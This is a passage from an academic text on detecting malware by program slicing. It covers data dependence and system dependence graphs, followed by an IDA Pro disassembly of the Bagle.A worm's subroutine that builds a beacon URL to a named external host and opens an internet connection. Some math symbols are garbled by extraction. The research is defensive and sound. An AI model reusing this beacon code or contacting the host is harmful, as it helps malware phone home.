[ Pobierz całość w formacie PDF ]
results in the sets uj and dj for each instruction j, which contain all used and defined
arguments of j, respectively. During the analysis we also determine the sets uj(a) for
every a " dj, which contain the arguments of j actually used to compute the value
of a. Obviously uj = U uj(a) for each instruction j, but instructions may exist
a"dj
where uj(a) ‚" uj for a defined argument a. Unlike that in high-level programs, in
binaries the parameter list of procedures is not defined explicitly but has to be
determined via a suitable interprocedural analysis. We use a fix-point iteration to
collect the sets of input and output parameters of each function. We compute the
sets Uf and Df representing the used and defined arguments of all instructions in
function f itself and in functions called (transitively) from f. If is the set of
instructions in f and Cf is the set of functions called from f. The resulting set Df is
4
The algorithm only determines if the instruction reads from or writes to memory.
37
called the set of output parameters of function f, while Uf *" Df yields the set of
input parameters of f [27].
5
Figure 13. A graph-based model.
Finally, the CDG is extended to create the DDG. Nodes that represent the
instructions of the program, the used and defined arguments of each instruction, the
parameters of the called function, and the formal input (formal-in) and output
(formal-out) parameters are added to the graph.
Once the individual PDGs for each individual function have been
constructed, intraprocedural and interprocedural slices can be computed. Here we
concentrate on computing interprocedural slices. The individual PDGs have to be
interconnected and this is achieved by connecting all actual-in and actual-out
parameter nodes with the appropriate formal-in and formal-out nodes using
parameter-in and parameter-out edges. Actual-in and actual-out parameters are
nodes created for all input and output parameters of the called function,
respectively (in effect, each function call in a PDG is connected with the
corresponding PDG of the called function). The resulting graph is now called a
system dependence graph (SDG). The SDG is further augmented with summary
5
Image taken from slides by Judith A. Stafford (University of Colorado at Boulder).
38
edges to represent dependencies between actual-in and actual-out parameters. For
more details, refer to [27].
At this point, let s take a look at actual Bagle virus assembly code. This
assembly code was derived from version A of the Bagle virus by using the
commercial disassembler IDA Pro. Here we will look at the part of the code that is
responsible for searching all hard drives for email addresses. According to the
system architecture, we slice the target executable based on suspicious APIs. It is
assumed that this database of suspicious APIs has been previously compiled and
has been kept up to date. Examples of suspicious APIs that we will use in the
following pages include InternetOpenUrlA, FindFirstFileA, and
FindNextFileA.
The first suspicious API we will look at is InternetOpenUrlA. This
API function is imported wininet.dll and is used to open a resource specified
by the URL (typically an HTTP URL). Code 7 contains the assembly code for the
subroutine from where InternetOpenUrlA is called and the slice with respect
to variable hMem at location 00402D97 (in gray).
beagle:00402D3D
beagle:00402D3D ; ¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
beagle:00402D3D
beagle:00402D3D ; Attributes: bp-based frame
beagle:00402D3D
beagle:00402D3D sub_402D3D proc near ; CODE XREF: sub_402DC2+1F p
beagle:00402D3D
beagle:00402D3D hMem = dword ptr -8
beagle:00402D3D var_4 = dword ptr -4
beagle:00402D3D arg_0 = dword ptr 8
beagle:00402D3D
beagle:00402D3D push ebp
beagle:00402D3E mov ebp, esp
beagle:00402D40 add esp, 0FFFFFF94h
beagle:00402D43 push ebx
beagle:00402D44 push esi
beagle:00402D45 push 400h ; dwBytes
beagle:00402D4A push 40h ; uFlags
beagle:00402D4C call GlobalAlloc
beagle:00402D51 mov [ebp+hMem], eax ; result of GlobalAlloc moved into
; hMem
39
beagle:00402D54 push offset Data ; registry_value of uid (38174321)
beagle:00402D59 push dword_405003 ; port_number = 1A79h = 6,777
; (hardcoded elsewhere in the body)
beagle:00402D5F push [ebp+arg_0] ; argument passed insite =
; http://www.elrasshop.de/1.php
beagle:00402D62 push offset aS?pLuIdS ; "%s?p=%lu&id=%s"
beagle:00402D67 push [ebp+hMem] ; buffer just allocated with
; GlobalAlloc()
beagle:00402D6A call wsprintfA
beagle:00402D6F add esp, 14h
beagle:00402D72 call sub_402D22
beagle:00402D77 push 0
beagle:00402D79 push 0
beagle:00402D7B push 0
beagle:00402D7D push 1
beagle:00402D7F push offset aBeagle_beagle ; "beagle_beagle"
beagle:00402D84 call InternetOpenA
beagle:00402D89 mov [ebp+var_4], eax
beagle:00402D8C push 0 ; context
beagle:00402D8E push 40000000h ; flag = INTERNET_FLAG_RAW_DATA
[ Pobierz całość w formacie PDF ]